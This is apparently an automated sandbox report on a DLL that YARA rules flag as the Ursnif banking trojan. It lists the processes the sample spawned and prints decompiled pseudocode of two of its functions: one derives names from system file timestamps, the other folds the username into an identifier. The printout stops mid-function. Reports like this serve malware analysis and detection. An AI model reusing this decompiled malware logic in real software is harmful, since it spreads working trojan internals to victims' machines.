00000002.00000003.763148290.0000000000F40000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6932 Parent PID: 6912

General

Start time:	00:29:45
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\laka4.dll',#1
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905711954.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905674059.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905782753.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905833677.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1009913837.000000000541C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905819560.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905803436.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.764888743.0000000002F40000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905753199.0000000005618000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.905845684.0000000005618000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6952 Parent PID: 6880

General

Start time:	00:29:45
Start date:	29/04/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x7ff6ee560000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6964 Parent PID: 6920

General

Start time:	00:29:45
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6992 Parent PID: 6932

General

Start time:	00:29:45
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7036 Parent PID: 6880

General

Start time:	00:29:46
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\laka4.dll,Brightnight
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000008.00000003.766624106.0000000002E10000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7084 Parent PID: 6964

General

Start time:	00:29:46
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 7096 Parent PID: 6952

General

Start time:	00:29:46
Start date:	29/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6952 CREDAT:17410 /prefetch:2
Imagebase:	0x9a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 7104 Parent PID: 6992

General

Start time:	00:29:46
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7128 Parent PID: 7036

General

Start time:	00:29:46
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 7164 Parent PID: 6920

General

Start time:	00:29:46
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6112 Parent PID: 6932

General

Start time:	00:29:47
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6136 Parent PID: 7128

General

Start time:	00:29:47
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5724 Parent PID: 7164

General

Start time:	00:29:47
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 3080 Parent PID: 6112

General

Start time:	00:29:47
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6568 Parent PID: 7036

General

Start time:	00:29:48
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 660 Parent PID: 6920

General

Start time:	00:29:48
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4684 Parent PID: 6932

General

Start time:	00:29:48
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5996 Parent PID: 6568

General

Start time:	00:29:48
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6664 Parent PID: 660

General

Start time:	00:29:49
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6316 Parent PID: 4684

General

Start time:	00:29:49
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6676 Parent PID: 6880

General

Start time:	00:29:49
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\laka4.dll,DllRegisterServer
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000018.00000003.775701050.0000000003110000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857625114.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.959293774.00000000054AC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857795473.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857776316.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857683077.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857820386.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857808720.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857714581.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.857756795.00000000056A8000.00000004.00000040.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 6412 Parent PID: 7036

General

Start time:	00:29:50
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6428 Parent PID: 6412

General

Start time:	00:29:50
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6516 Parent PID: 6676

General

Start time:	00:29:50
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6416 Parent PID: 6516

General

Start time:	00:29:51
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1368 Parent PID: 6880

General

Start time:	00:29:53
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4780 Parent PID: 6676

General

Start time:	00:29:55
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6784 Parent PID: 6880

General

Start time:	00:29:57
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6792 Parent PID: 4780

General

Start time:	00:29:57
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 5756 Parent PID: 6676

General

Start time:	00:29:59
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6712 Parent PID: 5756

General

Start time:	00:30:02
Start date:	29/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6904 Parent PID: 6880

General

Start time:	00:30:03
Start date:	29/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo 'Guess s'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6880 Parent PID: 6028 loaddll32.exeCOMMON

Executed Functions

Function 007D7DA3, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E007D7DA3(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x7dd278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x7dd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x7dd278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x7dd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x7dd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x7dd278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x7dd27c; // 0x2bda5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x7de7f2; // 0x73797325
				_t83 = E007D8D0B(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x7dd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x7dd27c; // 0x2bda5a8
				_t16 = _t93 + 0x7de813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x007d7dac
0x007d7db2
0x007d7db4
0x007d7dce
0x007d7dd2
0x007d7dd5
0x007d804a
0x007d8051
0x007d8051
0x007d7ddb
0x007d7df0
0x007d7df2
0x007d7df6
0x007d7df9
0x007d803a
0x007d8044
0x00000000
0x007d8044
0x007d7dff
0x007d7e0a
0x007d7e0f
0x007d7e14
0x007d7e17
0x007d7e1e
0x007d7e25
0x007d7e28
0x007d802a
0x007d8034
0x00000000
0x007d8034
0x007d7e3e
0x007d7e42
0x007d7e45
0x007d7e48
0x007d7e50
0x007d7e53
0x007d7e5c
0x007d7e62
0x007d7e6c
0x007d7e73
0x007d7e73
0x007d7e85
0x007d7e90
0x007d7e9e
0x007d7ea3
0x007d7ea8
0x007d7eab
0x007d7eb0
0x007d7eba
0x007d7ebd
0x007d7ec0
0x007d7ed6
0x007d7eda
0x007d7edd
0x007d8028
0x00000000
0x007d8028
0x007d7ef4
0x007d7f45
0x007d7f08
0x007d7f10
0x007d7f15
0x007d7f23
0x007d7f2c
0x007d7f35
0x007d7f35
0x007d7f43
0x007d7f43
0x007d7f49
0x007d7f4d
0x007d7f4d
0x007d7f53
0x00000000
0x00000000
0x007d7f55
0x007d7f5b
0x007d8002
0x007d8005
0x007d8012
0x007d8012
0x007d8016
0x00000000
0x00000000
0x007d800b
0x007d800f
0x007d800f
0x007d8011
0x007d8011
0x007d801b
0x007d8022
0x007d8024
0x00000000
0x007d8024
0x007d7f61
0x007d7f63
0x007d7f63
0x007d7f76
0x007d7f7c
0x007d7f87
0x007d7f89
0x007d7f8d
0x007d7f8f
0x007d7f8f
0x007d7f94
0x007d7f96
0x007d7f96
0x007d7f94
0x007d7f9b
0x007d7f9f
0x007d7f9f
0x007d7faf
0x007d7fb4
0x007d7fb7
0x007d7fb7
0x007d7fba
0x007d7fc4
0x007d7fcc
0x007d7fd1
0x007d7fdf
0x007d7fdf
0x007d7ff3
0x007d7ff7
0x007d7ff7

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 007D7DCE
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 007D7DF0
memset.NTDLL ref: 007D7E0A

Part of subcall function 007D8D0B: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,007D59DA,63699BCE,007D7E23,73797325), ref: 007D8D1C
Part of subcall function 007D8D0B: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 007D8D36

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 007D7E48
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 007D7E5C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 007D7E73
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 007D7E7F
lstrcat.KERNEL32(?,642E2A5C), ref: 007D7EC0
FindFirstFileA.KERNELBASE(?,?), ref: 007D7ED6
CompareFileTime.KERNEL32(?,?), ref: 007D7EF4
FindNextFileA.KERNELBASE(007D93A5,?), ref: 007D7F08
FindClose.KERNEL32(007D93A5), ref: 007D7F15
FindFirstFileA.KERNEL32(?,?), ref: 007D7F21
CompareFileTime.KERNEL32(?,?), ref: 007D7F43
StrChrA.SHLWAPI(?,0000002E), ref: 007D7F76
memcpy.NTDLL(00000000,?,00000000), ref: 007D7FAF
FindNextFileA.KERNELBASE(007D93A5,?), ref: 007D7FC4
FindClose.KERNEL32(007D93A5), ref: 007D7FD1
FindFirstFileA.KERNEL32(?,?), ref: 007D7FDD
CompareFileTime.KERNEL32(?,?), ref: 007D7FED
FindClose.KERNELBASE(007D93A5), ref: 007D8022
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 007D8034
HeapFree.KERNEL32(00000000,?), ref: 007D8044

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID:
API String ID: 2944988578-0
Opcode ID: b4f9263e8a8a363b80fb1dbfee9714f70b71249e337a33e44fdc44856cb4bdf8
Instruction ID: ec21a53dca11212557e9e5f8aa04377d20b33fc09cda99694957b39215fdbca4
Opcode Fuzzy Hash: b4f9263e8a8a363b80fb1dbfee9714f70b71249e337a33e44fdc44856cb4bdf8
Instruction Fuzzy Hash: 3B815971D00109EFDF219FA5DC84AEEBBB9FB48300F14416BE505E6260E7789E45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 007D3C3A, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E007D3C3A(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x7dd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E007D90BE( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x7dd278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x7dd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E007D168D(_v8 + _v8, _t63);
							}
							HeapFree( *0x7dd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
